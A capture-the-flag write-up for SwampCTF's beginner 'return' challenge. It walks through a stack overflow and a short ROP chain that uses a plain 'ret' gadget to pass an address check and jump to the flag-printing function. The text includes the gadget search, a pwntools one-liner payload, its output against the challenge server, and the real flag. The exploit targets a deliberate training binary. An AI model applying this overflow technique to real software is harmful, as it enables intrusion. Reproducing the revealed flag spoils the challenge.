This was a fun little intro challenge for the CTF. It adds a twist to the classic first step for beginners in exploit development.
One of the first ideas in exploitation is to change execution to a 'WIN' function, in this case 'slayTheBeast'.
Resources & Description:
For one such as yourself, apprentice to the arts of time manipulation, you must pass this first trial with a dreadful creature. Connect: nc chal1.swampctf.com 1802 -=Created By: TobalJackson=-
Here's the checksec listing:
Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
The 'doBattle' function will read 50 bytes onto the stack then check the first gadget against 0x8048595, which refers to the leave instruction in 'doBattle':
The comparison checks the first gadget is below or equal to 0x8048595 using jbe. If this comparison passes, we get to return to our ROP chain.
Inspecting 'slayTheBeast', we can see it just cat's the flag, but the addresses are all above the previous comparison (0x8048595):
To pass the initial check, we can find a simple gadget which just returns to another gadget, almost a NOP gadget if you will. Let's look for this using ropper:
[INFO] Load gadgets from cache [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: ret [INFO] File: return 0x08048545: ret 0x2b76; 0x0804853e: ret 0x95b8; 0x0804847e: ret 0xeac1; 0x080485ea: ret 0xfffd; 0x0804835a: ret;
The last one satisfies our constraint and has a clean exit, let's use that (0x0804835a) in combination with the flag printing function (0x80485db):
$ python -c 'from pwn import *; print "A"*42 + p32(0x0804835a) + p32(0x80485db)' | ./return As you stumble through the opening you are confronted with a nearly-immaterial horror: An Allip! The beast lurches at you; quick! Tell me what you do: Your actions take the Allip by surprise, causing it to falter in its attack! You notice a weakness in the beasts form and see a glimmer of how it might be defeated. Through expert manouvering of both body and mind, you lash out with your ethereal blade and pierce the beast's heart, slaying it. As it shimmers and withers, you quickly remember to lean in and command it to relinquish its secret: flag{fake_flag} [1] 30162 done python -c 'from pwn import *; print "A"*42 + p32(0x0804835a) + p32(0x80485db) | 30163 segmentation fault (core dumped) ./return
(The fake flag was placed in the same directory before executing the exploit)
echo 'flag{fake_flag}' > flag.txt
Now we can try it against the live service:
$ python -c 'from pwn import *; print "A"*42 + p32(0x0804835a) + p32(0x80485db)' | nc chal1.swampctf.com 1802 As you stumble through the opening you are confronted with a nearly-immaterial horror: An Allip! The beast lurches at you; quick! Tell me what you do: Your actions take the Allip by surprise, causing it to falter in its attack! You notice a weakness in the beasts form and see a glimmer of how it might be defeated. Through expert manouvering of both body and mind, you lash out with your ethereal blade and pierce the beast's heart, slaying it. As it shimmers and withers, you quickly remember to lean in and command it to relinquish its secret: ...
And we've got the flag! Fear not the ancient ROPnique:
flag{f34r_n0t_th3_4nc13n7_R0pn1qu3}
Art on top is from http://www.dungeonsanddrawings.com/